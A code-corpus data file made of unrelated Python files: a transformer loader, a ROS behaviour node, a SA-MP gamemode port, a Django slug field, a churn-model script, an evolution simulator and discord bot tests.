    """Loads pretrained transformer artifacts (model, config, tokenizer) from
    a model name or local path, using the classes resolved by LoadModel for
    the given model type."""

    def __init__(self, model_type, model_name_or_path, cache_dir):
        super().__init__(model_type)
        self.model_name_or_path = model_name_or_path
        self.cache_dir = cache_dir

    def _cache(self):
        # Normalize a falsy cache_dir ('' or None) to None for from_pretrained.
        return self.cache_dir if self.cache_dir else None

    def get_pretrained_model(self, config):
        """Instantiate the pretrained weights; TF checkpoints are detected by
        the ".ckpt" marker in the path."""
        is_tf_checkpoint = ".ckpt" in self.model_name_or_path
        return self.model_class.from_pretrained(
            self.model_name_or_path,
            from_tf=bool(is_tf_checkpoint),
            config=config,
            cache_dir=self._cache(),
        )

    def get_pretrained_config(self, config_name=None):
        """Load the model configuration; falls back to the model path when no
        explicit config name is given."""
        source = config_name if config_name else self.model_name_or_path
        return self.config_class.from_pretrained(
            source,
            cache_dir=self._cache(),
        )

    def get_tokenizer(self, max_positional_embedding_length, tokenizer_name=None, do_lower=True):
        """Load the tokenizer, capping sequences at the model's positional
        embedding length; falls back to the model path for the source."""
        source = tokenizer_name if tokenizer_name else self.model_name_or_path
        return self.tokenizer_class.from_pretrained(
            source,
            do_lower_case=do_lower,
            cache_dir=self._cache(),
            max_len=max_positional_embedding_length,
        )
def get_pretrained_model(model_type, model_name_or_path, cache_dir):
    """Build a loader and return ``(loader, model, config)`` for it."""
    logging.info("loading pretrained model with model type: {}, model name or path: {}, and cache_dir: {}"
                 .format(model_type, model_name_or_path, cache_dir))
    loader = LoadPretrainedModel(model_type=model_type,
                                 model_name_or_path=model_name_or_path,
                                 cache_dir=cache_dir)
    config = loader.get_pretrained_config()
    model = loader.get_pretrained_model(config=config)
    return loader, model, config
def get_pretrained_tokenizer(model_type, model_name_or_path, cache_dir, max_positional_embedding_length=512):
    """Build a loader and return the pretrained tokenizer from it."""
    logging.info("loading pretrained tokenizer with model type: {}, model name or path: {}, cache_dir: {}, and pos "
                 "embedding length: {}".format(model_type, model_name_or_path, cache_dir, max_positional_embedding_length))
    loader = LoadPretrainedModel(model_type=model_type,
                                 model_name_or_path=model_name_or_path,
                                 cache_dir=cache_dir)
    return loader.get_tokenizer(max_positional_embedding_length)
| StarcoderdataPython |
1981674 | <gh_stars>0
#!/usr/bin/env python
"""Example of a basic tractor behavior.
This module demonstrates an example behavior written in python to be
compatible with the state controller. The behavior publishes any
command received on /ex_topic directly to the corresponding topic
/state_controller/cmd_behavior.
authored by <NAME> on 2019-10-29
"""
import rospy
from geometry_msgs.msg import Twist
from state_controller.msg import TwistLabeled
class BehaviorEx():
    """Example tractor behavior: relays /ex_topic Twists to the state controller."""

    def __init__(self):
        """Initialize node, publisher and subscriber."""
        # In ROS, nodes are uniquely named. If two nodes with the same
        # name are launched, the previous one is kicked off. The
        # anonymous=True flag means that rospy will choose a unique
        # name for our 'listener' node so that multiple listeners can
        # run simultaneously.
        rospy.init_node('behavior_ex', anonymous=True)
        rospy.Subscriber('/ex_topic', Twist, self.callback)
        # queue_size=1: only the most recent command matters; drop stale ones.
        self.twist_publisher = rospy.Publisher(
            '/state_controller/cmd_behavior', TwistLabeled, queue_size=1)
        # spin() simply keeps python from exiting until this node is stopped
        rospy.spin()

    def callback(self, data):
        """Forward recieved twist message to state controller with label."""
        new_msg = TwistLabeled()
        new_msg.twist = data
        # The label lets the state controller attribute the command to this behavior.
        new_msg.label.data = 'example'
        self.twist_publisher.publish(new_msg)


if __name__ == '__main__':
    b = BehaviorEx()
| StarcoderdataPython |
1918781 | <reponame>Cheaterman/PySAMP<gh_stars>10-100
import random
from samp import *
from glspawns import *
from funcs import *
from vars import *
from player import *
################################
"""
Hello dear user!
Welcome to the Python version of the original Grand Larceny gamemode!
We wanted to convert this classic gamemode into what it would look like
in python, and here is the result. We took our liberty to nick it "PyLarc".
The intention behind converting it, was to give you all an idea of how the plugin works,
and to give you all a good example.
We have tried to show how player classes can be implemented (check player.py), and
also how the general usage works.
Everything here should function as in the original PAWN version, and if you
find any bugs, you can report them on our repo; https://github.com/habecker/PySAMP/issues
For now, enjoy the code, and good luck!
denNorske & Habecker
"""
################################
def OnGameModeInit():
    """SA-MP gamemode init: world settings, class-selection textdraws,
    one spawnable class per skin, and the static vehicle fleet.

    Returns True (SA-MP callback convention).
    """
    SetGameModeText('PyLarc')
    print("-----------------------------------------------")
    print("Running Grand Larceny - by the SA-MP team\nRe-written to python 3.8.6 by the PySAMP Team")
    print("-----------------------------------------------")
    ShowPlayerMarkers(1) # PLAYER_MARKERS_MODE_GLOBAL = 1
    ShowNameTags(True)
    SetNameTagDrawDistance(40)
    EnableStuntBonusForAll(False)
    DisableInteriorEnterExits()
    SetWeather(2)
    #LimitGlobalChatRadius(300.0)
    ClassSel_InitTextDraws()
    # Player classes: every selectable skin spawns at the same Los Santos
    # point, so register them in a loop instead of 45 copy-pasted calls.
    player_skins = (
        1, 2,
        47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58,
        68, 69, 70, 71, 72, 73,
        75, 76,
        78, 79, 80, 81, 82, 83, 84, 85,
        87, 88, 89,
        91, 92, 93,
        95, 96, 97, 98, 99,
        269, 270, 271, 272,
    )
    for skin_id in player_skins:
        AddPlayerClass(skin_id, 1759.0189, -1898.1260, 13.5622, 266.4503,
                       -1, -1, -1, -1, -1, -1)
    # Static vehicles, one definition file per area/category.
    vehicle_files = (
        # SPECIAL:
        "trains", "pilots",
        # Las Venturas
        "lv_law", "lv_airport", "lv_gen",
        # San fierro
        "sf_law", "sf_airport", "sf_gen",
        # Los Santos
        "ls_law", "ls_airport", "ls_gen_inner", "ls_gen_outer",
        # Other areas
        "whetstone", "bone", "flint", "tierra", "red_county",
    )
    total_vehicles_from_files = sum(
        LoadStaticVehiclesFromFile("scriptfiles/vehicles/%s.txt" % file_name)
        for file_name in vehicle_files
    )
    print("Total vehicles from files: {}".format(total_vehicles_from_files))
    return True
def OnGameModeExit():
    # Nothing to tear down; SA-MP handles script shutdown.
    return True


def OnPlayerConnect(playerid):
    """Greet a connecting player and register their Player record."""
    GameTextForPlayer(playerid,"~w~Grand Larceny",3000,4)
    SendClientMessage(playerid,COLOR_WHITE,"Welcome to Grand Larceny")
    # Args presumably (playerid, city_selection=-1 i.e. none yet,
    # has_city_selected=False, last_city_selection_tick) — see player.py.
    _player_obj = Player(playerid, -1, False, GetTickCount())
    players.append(_player_obj)
    return True


def OnPlayerDisconnect(playerid, reason):
    """Drop the disconnecting player's record from the global players list."""
    for player in players:
        if player.playerid == playerid:
            players.remove(player)
            break
    return True
def OnPlayerSpawn(playerid):
    """Set up a freshly spawned player: random spawn point in the chosen
    city, starting cash, boosted weapon skills and a starting pistol.

    Returns True (SA-MP callback convention).
    """
    if IsPlayerNPC(playerid):
        return True
    SetPlayerInterior(playerid, 0)
    TogglePlayerClock(playerid, 0)
    ResetPlayerMoney(playerid)
    GivePlayerMoney(playerid, 30000)
    for player in players:
        if player.playerid == playerid:
            # Force a fresh city pick on the next class-selection screen.
            player.has_city_selected = False
            if player.city_selection == CITY_LOS_SANTOS:
                spawn_table = gRandomSpawns_LosSantos
            elif player.city_selection == CITY_SAN_FIERRO:
                spawn_table = gRandomSpawns_SanFierro
            elif player.city_selection == CITY_LAS_VENTURAS:
                spawn_table = gRandomSpawns_LasVenturas
            else:
                spawn_table = None
            if spawn_table:
                # BUG FIX: the original used random.randint(0, len(table)),
                # whose upper bound is inclusive, so it could index one past
                # the end of the spawn list and raise IndexError.
                # random.choice picks a valid entry by construction.
                spawn = random.choice(spawn_table)
                SetPlayerPos(playerid, spawn[0], spawn[1], spawn[2])
    # Raise every weapon skill level to 200.
    SetPlayerSkillLevel(playerid,Const("WEAPONSKILL_PISTOL"),200)
    SetPlayerSkillLevel(playerid,Const("WEAPONSKILL_PISTOL_SILENCED"),200)
    SetPlayerSkillLevel(playerid,Const("WEAPONSKILL_DESERT_EAGLE"),200)
    SetPlayerSkillLevel(playerid,Const("WEAPONSKILL_SHOTGUN"),200)
    SetPlayerSkillLevel(playerid,Const("WEAPONSKILL_SAWNOFF_SHOTGUN"),200)
    SetPlayerSkillLevel(playerid,Const("WEAPONSKILL_SPAS12_SHOTGUN"),200)
    SetPlayerSkillLevel(playerid,Const("WEAPONSKILL_MICRO_UZI"),200)
    SetPlayerSkillLevel(playerid,Const("WEAPONSKILL_MP5"),200)
    SetPlayerSkillLevel(playerid,Const("WEAPONSKILL_AK47"),200)
    SetPlayerSkillLevel(playerid,Const("WEAPONSKILL_M4"),200)
    SetPlayerSkillLevel(playerid,Const("WEAPONSKILL_SNIPERRIFLE"),200)
    GivePlayerWeapon(playerid,22,100) # Colt 45
    return True
def OnPlayerDeath(playerid, killerid, reason):
    """On death, hand the victim's cash to the killer (when there is one)
    and zero the victim's money either way."""
    INVALID_PLAYER_ID = 65535  # SA-MP sentinel: died without a killer
    if killerid != INVALID_PLAYER_ID:
        GivePlayerMoney(killerid, GetPlayerMoney(playerid))
    ResetPlayerMoney(playerid)
    return True
# Used to init textdraws of city names
def ClassSel_InitCityNameText(txtInit):
    """Apply the shared big-letter style to a city-name textdraw *txtInit*."""
    TextDrawUseBox(txtInit, 0)
    TextDrawLetterSize(txtInit,1.25,3.0)
    TextDrawFont(txtInit, 0)
    TextDrawSetShadow(txtInit,0)
    TextDrawSetOutline(txtInit,1)
    TextDrawColor(txtInit,4008636159)
    # BUG FIX: this call previously targeted the global txtClassSelHelper
    # (a copy-paste slip), leaving the city-name draws without a background
    # colour; the original PAWN gamemode styles the passed-in textdraw.
    TextDrawBackgroundColor(txtInit,255)
    return
def ClassSel_InitTextDraws():
    """Create the three city-name textdraws and the key-hint helper textdraw."""
    global txtLosSantos
    global txtSanFierro
    global txtLasVenturas
    global txtClassSelHelper
    # City name textdraws, all sharing the same style/position.
    txtLosSantos = TextDrawCreate(10.0, 380.0, "Los Santos")
    ClassSel_InitCityNameText(txtLosSantos)
    txtSanFierro = TextDrawCreate(10.0, 380.0, "San Fierro")
    ClassSel_InitCityNameText(txtSanFierro)
    txtLasVenturas = TextDrawCreate(10.0, 380.0, "Las Venturas")
    ClassSel_InitCityNameText(txtLasVenturas)
    # Init our observer helper text display
    txtClassSelHelper = TextDrawCreate(10.0, 415.0,
        " Press ~b~~k~~GO_LEFT~ ~w~or ~b~~k~~GO_RIGHT~ ~w~to switch cities.~n~ Press ~r~~k~~PED_FIREWEAPON~ ~w~to select.")
    TextDrawUseBox(txtClassSelHelper, 1)
    TextDrawBoxColor(txtClassSelHelper,572662459)
    TextDrawLetterSize(txtClassSelHelper,0.3,1.0)
    TextDrawTextSize(txtClassSelHelper,400.0,40.0)
    TextDrawFont(txtClassSelHelper, 2)
    TextDrawSetShadow(txtClassSelHelper,0)
    TextDrawSetOutline(txtClassSelHelper,1)
    TextDrawBackgroundColor(txtClassSelHelper,255)
    TextDrawColor(txtClassSelHelper,4294967295)
    return


def ClassSel_SetupCharSelection(playerid):
    """Place the player's camera in the skin-selection interior of their city."""
    for player in players:
        if player.playerid == playerid:
            if player.city_selection == CITY_LOS_SANTOS:
                SetPlayerInterior(playerid,11)
                SetPlayerPos(playerid,508.7362,-87.4335,998.9609)
                SetPlayerFacingAngle(playerid,0.0)
                SetPlayerCameraPos(playerid,508.7362,-83.4335,998.9609)
                SetPlayerCameraLookAt(playerid,508.7362,-87.4335,998.9609)
            elif player.city_selection == CITY_SAN_FIERRO:
                SetPlayerInterior(playerid,3)
                SetPlayerPos(playerid,-2673.8381,1399.7424,918.3516)
                SetPlayerFacingAngle(playerid,181.0)
                SetPlayerCameraPos(playerid,-2673.2776,1394.3859,918.3516)
                SetPlayerCameraLookAt(playerid,-2673.8381,1399.7424,918.3516)
            elif player.city_selection == CITY_LAS_VENTURAS:
                SetPlayerInterior(playerid,3)
                SetPlayerPos(playerid,349.0453,193.2271,1014.1797)
                SetPlayerFacingAngle(playerid,286.25)
                SetPlayerCameraPos(playerid,352.9164,194.5702,1014.1875)
                SetPlayerCameraLookAt(playerid,349.0453,193.2271,1014.1797)
            break
    return


def ClassSel_SetupSelectedCity(playerid):
    """Aim the spectator camera at the currently selected city and show its name."""
    global txtLosSantos
    global txtSanFierro
    global txtLasVenturas
    for player in players:
        if player.playerid == playerid:
            # First entry into selection: default to Los Santos.
            if player.city_selection == -1:
                player.city_selection = CITY_LOS_SANTOS
            if player.city_selection == CITY_LOS_SANTOS:
                SetPlayerInterior(playerid,0)
                SetPlayerCameraPos(playerid,1630.6136,-2286.0298,110.0)
                SetPlayerCameraLookAt(playerid,1887.6034,-1682.1442,47.6167)
                TextDrawShowForPlayer(playerid,txtLosSantos)
                TextDrawHideForPlayer(playerid,txtSanFierro)
                TextDrawHideForPlayer(playerid,txtLasVenturas)
            elif player.city_selection == CITY_SAN_FIERRO:
                SetPlayerInterior(playerid,0)
                SetPlayerCameraPos(playerid,-1300.8754,68.0546,129.4823)
                SetPlayerCameraLookAt(playerid,-1817.9412,769.3878,132.6589)
                TextDrawHideForPlayer(playerid,txtLosSantos)
                TextDrawShowForPlayer(playerid,txtSanFierro)
                TextDrawHideForPlayer(playerid,txtLasVenturas)
            elif player.city_selection == CITY_LAS_VENTURAS:
                SetPlayerInterior(playerid,0)
                SetPlayerCameraPos(playerid,1310.6155,1675.9182,110.7390)
                SetPlayerCameraLookAt(playerid,2285.2944,1919.3756,68.2275)
                TextDrawHideForPlayer(playerid,txtLosSantos)
                TextDrawHideForPlayer(playerid,txtSanFierro)
                TextDrawShowForPlayer(playerid,txtLasVenturas)
            break
    return


def ClassSel_SwitchToNextCity(playerid):
    """Advance the city selection, wrapping past Las Venturas to Los Santos."""
    for player in players:
        if player.playerid == playerid:
            # Record the switch time for the ~500 ms debounce in
            # ClassSel_HandleCitySelection.
            player.last_city_selection_tick = GetTickCount()
            player.city_selection += 1
            if player.city_selection > CITY_LAS_VENTURAS:
                player.city_selection = CITY_LOS_SANTOS
            break
    PlayerPlaySound(playerid,1052,0.0,0.0,0.0)
    ClassSel_SetupSelectedCity(playerid)
    return


def ClassSel_SwitchToPreviousCity(playerid):
    """Step the city selection back, wrapping before Los Santos to Las Venturas."""
    for player in players:
        if player.playerid == playerid:
            player.last_city_selection_tick = GetTickCount()
            player.city_selection -= 1
            if player.city_selection < CITY_LOS_SANTOS:
                player.city_selection = CITY_LAS_VENTURAS
            break
    PlayerPlaySound(playerid,1053,0.0,0.0,0.0)
    ClassSel_SetupSelectedCity(playerid)
    return


def ClassSel_HandleCitySelection(playerid):
    """Poll the spectating player's keys: fire confirms the city,
    left/right cycles between cities (debounced to ~500 ms)."""
    global txtLosSantos
    global txtSanFierro
    global txtLasVenturas
    global txtClassSelHelper
    (Keys, ud, lr) = GetPlayerKeys(playerid)
    for player in players:
        if player.playerid == playerid:
            # only allow selection every ~500 ms
            if GetTickCount() - player.last_city_selection_tick < 500:
                break
            # No city shown yet: show the first one.
            if player.city_selection == -1 :
                ClassSel_SwitchToNextCity(playerid)
                break
            # Keys & 4 is KEY_FIRE: confirm the selection and leave spectate.
            if Keys & 4 :
                player.has_city_selected = True
                TextDrawHideForPlayer(playerid,txtClassSelHelper)
                TextDrawHideForPlayer(playerid,txtLosSantos)
                TextDrawHideForPlayer(playerid,txtSanFierro)
                TextDrawHideForPlayer(playerid,txtLasVenturas)
                TogglePlayerSpectating(playerid,False)
            # lr: left/right axis from GetPlayerKeys (positive = right).
            if lr > 0 :
                ClassSel_SwitchToNextCity(playerid)
            elif lr < 0 :
                ClassSel_SwitchToPreviousCity(playerid)
            break
    return True
def OnPlayerText(playerid, text):
    # Allow all chat messages unchanged.
    return True


def OnPlayerRequestClass(playerid, classid):
    """On class request: either enter skin selection (city already chosen)
    or put the player into spectate mode for city selection."""
    if IsPlayerNPC(playerid):
        return True
    global txtClassSelHelper
    for player in players:
        if player.playerid == playerid:
            if player.has_city_selected == True:
                ClassSel_SetupCharSelection(playerid)
                return True
            else:
                if GetPlayerState(playerid) != Const("PLAYER_STATE_SPECTATING"):
                    SpawnPlayer(playerid) # Why?
                    #Else player does not load in correctly and the toggle below will disconnect the player.
                    # Read the known issues on our repo wiki.
                # Enter spectate mode so the flying city camera can be shown.
                TogglePlayerSpectating(playerid, 1)
                TextDrawShowForPlayer(playerid, txtClassSelHelper)
                # -1 = no city picked yet; HandleCitySelection shows the first.
                player.city_selection = -1
    return True
def OnPlayerUpdate(playerid):
    """Per-sync player hook: drive city selection while spectating and
    enforce the no-weapons-in-interiors / no-minigun / no-jetpack rules.

    Returning False drops the sync update for this tick.
    """
    if IsPlayerConnected(playerid) == False:
        return False
    if IsPlayerNPC(playerid):
        return True
    for player in players:
        if player.playerid == playerid:
            if ( player.has_city_selected == False and
                    GetPlayerState(playerid) == Const("PLAYER_STATE_SPECTATING") ):
                ClassSel_HandleCitySelection(playerid)
    # Interiors are weapon-free: force fists and drop the sync.
    if GetPlayerInterior(playerid) != 0 and GetPlayerWeapon(playerid) != 0:
        SetPlayerArmedWeapon(playerid, 0) # Fists
        return False #No syncing until they change their weapon
    if GetPlayerWeapon(playerid) == 38 or GetPlayerSpecialAction(playerid) == 2: #minigun and jetpack not allowed
        Kick(playerid)
        return False
    return True
| StarcoderdataPython |
358212 | #!/usr/bin/env python
import httplib
# NOTE(review): Python 2 script — `print` statements and the `httplib`
# module (renamed http.client in Python 3).
# Open an HTTPS connection and issue a plain GET for the root document.
connection = httplib.HTTPSConnection("www.google.com", 443)
connection.request("GET", "/")
response = connection.getresponse()
# HTTP status code of the reply (e.g. 200).
print response.status
# Full response body as a byte string.
data = response.read()
print data
| StarcoderdataPython |
6440067 | <reponame>SectorLabs/django-localized-fields
from datetime import datetime
from django.core.exceptions import ImproperlyConfigured
from django.utils.text import slugify
from ..mixins import AtomicSlugRetryMixin
from ..util import get_language_codes
from ..value import LocalizedValue
from .autoslug_field import LocalizedAutoSlugField
class LocalizedUniqueSlugField(LocalizedAutoSlugField):
    """Automatically provides slugs for a localized field upon saving.".

    An improved version of :see:LocalizedAutoSlugField,
    which adds:

        - Concurrency safety
        - Improved performance

    When in doubt, use this over :see:LocalizedAutoSlugField.
    Inherit from :see:AtomicSlugRetryMixin in your model to
    make this field work properly.

    By default, this creates a new slug if the field(s) specified
    in `populate_from` are changed. Set `immutable=True` to get
    immutable slugs.
    """

    def __init__(self, *args, **kwargs):
        """Initializes a new instance of :see:LocalizedUniqueSlugField."""
        # Default uniqueness to one constraint per configured language.
        kwargs["uniqueness"] = kwargs.pop("uniqueness", get_language_codes())
        self.enabled = kwargs.pop("enabled", True)
        self.immutable = kwargs.pop("immutable", False)
        super(LocalizedUniqueSlugField, self).__init__(*args, **kwargs)
        # NOTE(review): populate_from/include_time are popped AFTER the
        # super().__init__ call — presumably the parent consumes/forwards
        # them first; confirm against LocalizedAutoSlugField.
        self.populate_from = kwargs.pop("populate_from")
        self.include_time = kwargs.pop("include_time", False)

    def deconstruct(self):
        """Deconstructs the field into something the database can store."""
        name, path, args, kwargs = super(
            LocalizedUniqueSlugField, self
        ).deconstruct()
        kwargs["populate_from"] = self.populate_from
        kwargs["include_time"] = self.include_time
        # Only serialize non-default flags to keep migrations minimal.
        if self.enabled is False:
            kwargs["enabled"] = self.enabled
        if self.immutable is True:
            kwargs["immutable"] = self.immutable
        return name, path, args, kwargs

    def pre_save(self, instance, add: bool):
        """Ran just before the model is saved, allows us to built the slug.

        Arguments:
            instance:
                The model that is being saved.

            add:
                Indicates whether this is a new entry
                to the database or an update.

        Returns:
            The localized slug that was generated.
        """
        if not self.enabled:
            return getattr(instance, self.name)
        # The mixin provides the `retries` counter used below for
        # concurrency-safe slug de-duplication.
        if not isinstance(instance, AtomicSlugRetryMixin):
            raise ImproperlyConfigured(
                (
                    "Model '%s' does not inherit from AtomicSlugRetryMixin. "
                    "Without this, the LocalizedUniqueSlugField will not work."
                )
                % type(instance).__name__
            )
        slugs = LocalizedValue()
        for lang_code, value in self._get_populate_values(instance):
            if not value:
                continue
            slug = slugify(value, allow_unicode=True)
            current_slug = getattr(instance, self.name).get(lang_code)
            # Immutable slugs: keep whatever was generated the first time.
            if current_slug and self.immutable:
                slugs.set(lang_code, current_slug)
                continue
            # verify whether it's needed to re-generate a slug,
            # if not, re-use the same slug
            if instance.pk is not None:
                if current_slug is not None:
                    # Strip the trailing "-<suffix>" (time/retry counter)
                    # before comparing against the freshly generated slug.
                    current_slug_end_index = current_slug.rfind("-")
                    stripped_slug = current_slug[0:current_slug_end_index]
                    if slug == stripped_slug:
                        slugs.set(lang_code, current_slug)
                        continue
            # Microsecond suffix reduces collision probability.
            if self.include_time:
                slug += "-%d" % datetime.now().microsecond
            # On unique-constraint conflicts the mixin retries the save with
            # an incremented `retries`, which lands here as a suffix.
            retries = getattr(instance, "retries", 0)
            if retries > 0:
                # do not add another - if we already added time
                if not self.include_time:
                    slug += "-"
                slug += "%d" % retries
            slugs.set(lang_code, slug)
        setattr(instance, self.name, slugs)
        return slugs
| StarcoderdataPython |
386294 | import catboost
from catboost import CatBoostClassifier
from xgboost import XGBClassifier
import gc
from sklearn.linear_model import LogisticRegression
from sklearn import preprocessing
import pandas as pd
import numpy as np
#add
#stopping dev due to xgboost issues
# Quick churn-model training script (KKBox-style data).
# Loads a processed feature frame and raw label files, label-encodes object
# columns, then fits/scores an XGBoost classifier.
df_train_data = pd.read_csv('data\\full_train.csv',nrows=10000)
print(len(df_train_data))
# Labels come from the two raw train files, concatenated.
df_train = pd.read_csv('data\\train.csv')
df_train2 = pd.read_csv('data\\train_v2.csv')
df_train = df_train.append(df_train2)
del df_train2
gc.collect()
target = df_train['is_churn']
# BUG FIX: the label vector must have exactly as many rows as the feature
# frame loaded above; the original hard-coded [0:9999] (9999 rows) against
# nrows=10000 features, which makes .fit raise a shape mismatch.
target = target[0:len(df_train_data)]
print('\nTraining Data columns\n', df_train_data.columns)
df_train_data = df_train_data.drop(['Unnamed: 0','date'], axis=1)
df_train_data = df_train_data.fillna(0)
print(df_train_data.head(5))
test = pd.read_csv('data\\full_test.csv')
print(len(test))
# Label-encode object columns the same way in train and test.
for col in df_train_data.select_dtypes(include=['object']).columns:
    df_train_data[col] = df_train_data[col].astype('category')
    test[col] = test[col].astype('category')
# Encoding categorical features
for col in df_train_data.select_dtypes(include=['category']).columns:
    df_train_data[col] = df_train_data[col].cat.codes
    test[col] = test[col].cat.codes
xgb = XGBClassifier(max_depth=4, n_estimators=300, learning_rate=0.05)
# BUG FIX: fit on the processed feature frame. The original called
# xgb.fit(df_train, target), i.e. trained on the raw label frame (which
# still contains unencoded object columns) while scoring df_train_data.
xgb.fit(df_train_data, target)
print('xggboost score', xgb.score(df_train_data, target))
#predictions = gbm.predict(test_X)
| StarcoderdataPython |
9771500 | <reponame>lleej/python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

'枚举类的练习'

__author__ = 'Jacklee'

# Plain module-level constants: the pre-enum way of naming months.
JAN = 1
FEB = 2
MAR = 3

# Enum-based alternatives.
from enum import Enum, unique


## First style: explicit subclass; @unique forbids duplicate values.
@unique
class Month(Enum):
    JAN = 0
    FEB = 1
    MAR = 2


## Second style: functional API; member values start at 1.
WeekDay = Enum('WeekDay', ('Mon', 'Tue', 'Wed', 'Tru', 'Fri', 'Sat', 'Sun'))

## Each member (JAN, ...) lives on the class itself.
print('Month类的成员: ', dir(Month))

# Walk the three members by value; dump the instance attributes once.
for _value in range(3):
    m = Month(_value)
    print(m.name, m.value)
    if _value == 0:
        print('Month对象实例的成员: ', dir(m))
| StarcoderdataPython |
3534383 | # Generated by Django 3.1.3 on 2021-01-11 22:42
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('hackathon', '0024_auto_20201103_2114'),
]
operations = [
migrations.AlterModelOptions(
name='hackteam',
options={'verbose_name': 'Hack Team', 'verbose_name_plural': 'Hack Teams'},
),
migrations.AlterField(
model_name='hackathon',
name='status',
field=models.CharField(choices=[('draft', 'Draft'), ('published', 'Published'), ('registration_open', 'Registration Open'), ('hack_in_progress', 'Hackathon In Progress'), ('judging', 'Judging'), ('finished', 'Hackathon Finished'), ('deleted', 'Deleted')], default='draft', max_length=20),
),
migrations.AlterUniqueTogether(
name='hackteam',
unique_together={('display_name', 'hackathon')},
),
]
| StarcoderdataPython |
1698709 | <reponame>TheInitializer/evolution_simulator<gh_stars>1-10
from pyglet.sprite import Sprite
import pyglet
from dna_parser import parse_dna, distance
import dna_parser
import random
from config import window_width, window_height
import food
import mutation
# Global registry of all living creatures; mutated by Creature methods.
creatures = []


class Creature(Sprite):
    """A pyglet sprite whose behavior is driven by an executable 'DNA' string."""

    # Class-level defaults shared until an instance overwrites them.
    signal = 0
    attacking = False
    cool = False  # debug flag: when True the creature prints trace output

    def __init__(self, mutability_chance: int, creature_number: int,
                 max_health: int, speed: int, dna: str, init_x: int,
                 init_y: int):
        self.mutability_chance = mutability_chance
        self.creature_number = creature_number
        # Stats are stored both scaled-for-gameplay and in their original
        # "relative" (percent-like) form, which is what offspring inherit.
        self.max_health = int((max_health / 100) * 50)
        self.relative_max_health = max_health
        self.speed = int((speed / 100) * 10)
        self.relative_speed = speed
        self.dna = dna
        self.health = self.max_health
        self.pos = (init_x, init_y)
        # NOTE(review): resource path is reset on every construction —
        # redundant after the first creature but harmless.
        pyglet.resource.path = ["resources"]
        pyglet.resource.reindex()
        creature = pyglet.resource.image("creature.png")
        super().__init__(creature, x=init_x, y=init_y)
        # Floating health label rendered at the creature's position.
        self.label = pyglet.text.Label(str(self.health),
                                       font_name='Times New Roman',
                                       font_size=16,
                                       x=self.x, y=self.y,
                                       anchor_x='center', anchor_y='center')

    def say_hi(self):
        print("hi")

    def do_stuff(self, other_creatures, foods):
        """One simulation tick: run the DNA program to vote on a direction,
        move, eat food / attack the nearest creature, decay health."""
        global creatures
        if self.cool: self.say_hi()
        # initialize
        nearest = dna_parser.nearest(self, other_creatures)
        nearest_food = dna_parser.nearest(self, foods)
        # Direction votes that the DNA program increments via exec below.
        self.votes = {
            "up": 0,
            "left": 0,
            "right": 0,
            "down": 0
        }
        # parse the dna
        # NOTE(review): exec of generated code — fine for this sandboxed
        # simulation, but never feed it untrusted input. The bare except
        # also swallows non-syntax errors raised by the DNA program.
        try:
            exec(parse_dna(self.dna, other_creatures))
        except:
            # Syntax errors are terminal diseases.
            # Kill the creature to put it out of its misery
            creatures.remove(self)
            #del(self)
            #return
            pass
        # don't fall off the edge
        # Repeatedly drop the winning direction while it would cross the
        # 16px window margin, then take the surviving winner.
        while True:
            mv = max(self.votes.values())
            direction = random.choice(
                [k for (k, v) in self.votes.items() if v == mv])
            if ((direction == "up" and self.y + self.speed >= window_height-16) or
                    (direction == "down" and self.y - self.speed <= 16) or
                    (direction == "left" and self.x - self.speed <= 16) or
                    (direction == "right" and self.x + self.speed >= window_width-16)):
                del self.votes[direction]
            else:
                break
        if self.cool: print("direction:", direction)
        if self.cool: print("speed:", self.speed)
        # move
        if direction == "up":
            if self.cool: print("going up")
            self.y += self.speed
        elif direction == "down":
            self.y -= self.speed
        elif direction == "right":
            self.x += self.speed
        elif direction == "left":
            self.x -= self.speed
        # eat food
        # Within a 24px box of the nearest food: consume it, respawn a new
        # food at a random spot, and heal one point (capped at max).
        if (nearest_food.x - 24 < self.x < nearest_food.x + 24 and
                nearest_food.y - 24 < self.y < nearest_food.y + 24):
            del foods[foods.index(nearest_food)]
            foods.append(food.Food(
                random.randint(0, window_width),
                random.randint(0, window_height)))
            if self.health < self.max_health:
                self.health += 1
        # eat fellow creatures
        # An attacking creature adjacent to its nearest neighbour chips one
        # health per tick; a kill grants +4 health (clamped to max).
        if (self.attacking and
                nearest.x - 24 < self.x < nearest.x + 24 and
                nearest.y - 24 < self.y < nearest.y + 24):
            other_creatures[other_creatures.index(nearest)].health -= 1
            if other_creatures[other_creatures.index(nearest)].health <= 0:
                other_creatures.remove(other_creatures[other_creatures.index(nearest)])
                self.health += 4
                if self.health > self.max_health: self.health = self.max_health
        # Rebuild the health label at the new position.
        self.label = pyglet.text.Label(str(int(self.health)),
                                       font_name='Times New Roman',
                                       font_size=16,
                                       x=self.x, y=self.y,
                                       anchor_x='center', anchor_y='center')
        # Passive decay every tick.
        self.health -= 0.1

    def give_birth(self):
        """Spawn a mutated offspring at a random spot, at the cost of half
        of this creature's current health."""
        global creatures
        # NOTE(review): the quoted "random.random() > 0.7" is a string
        # literal, which is always truthy — the birth chance is effectively
        # disabled and only the health threshold applies.
        if self.health >= self.max_health / 2 and "random.random() > 0.7":
            creatures.append(Creature(
                self.mutability_chance, self.creature_number, self.relative_max_health/2,
                self.relative_speed, mutation.mutate(self.dna),
                random.randint(16, window_width - 16),
                random.randint(16, window_height - 16)
            ))
            self.health = self.health//2
| StarcoderdataPython |
6540773 | <gh_stars>0
# Read one line of space-separated integers; print how many 5-unit groups
# their total splits into, or -1 when the total is zero or not a multiple
# of 5. (Dropped the redundant list() around map — sum consumes any iterable.)
n = sum(map(int, input().split()))
if n % 5 or n == 0:
    print(-1)
else:
    print(n // 5)
| StarcoderdataPython |
1940004 |
import pytest
from discord.ext.test import message, verify_message, verify_embed, verify_file
# Every test in this module runs against the 'testlos_m' bot fixture.
pytestmark = pytest.mark.usefixtures("testlos_m")


async def test_aesthetic():
    # ^aesthetic echoes the given text back.
    await message("^aesthetic Sphinx of black quartz, judge my vow")
    verify_message("Sphinx of black quartz, judge my vow")


async def test_catpic():
    # ^catpic replies with a file attachment.
    await message("^catpic")
    verify_file()


async def test_favor():
    await message("^favor")
    verify_message("I'm afraid I can't do that, TestUser.")


async def test_hi():
    await message("^hi")
    verify_message("Hello there TestUser")


async def test_xkcd():
    # Comic commands reply with an embed.
    await message("^xkcd")
    verify_embed()


async def test_smbc():
    await message("^smbc")
    verify_embed()


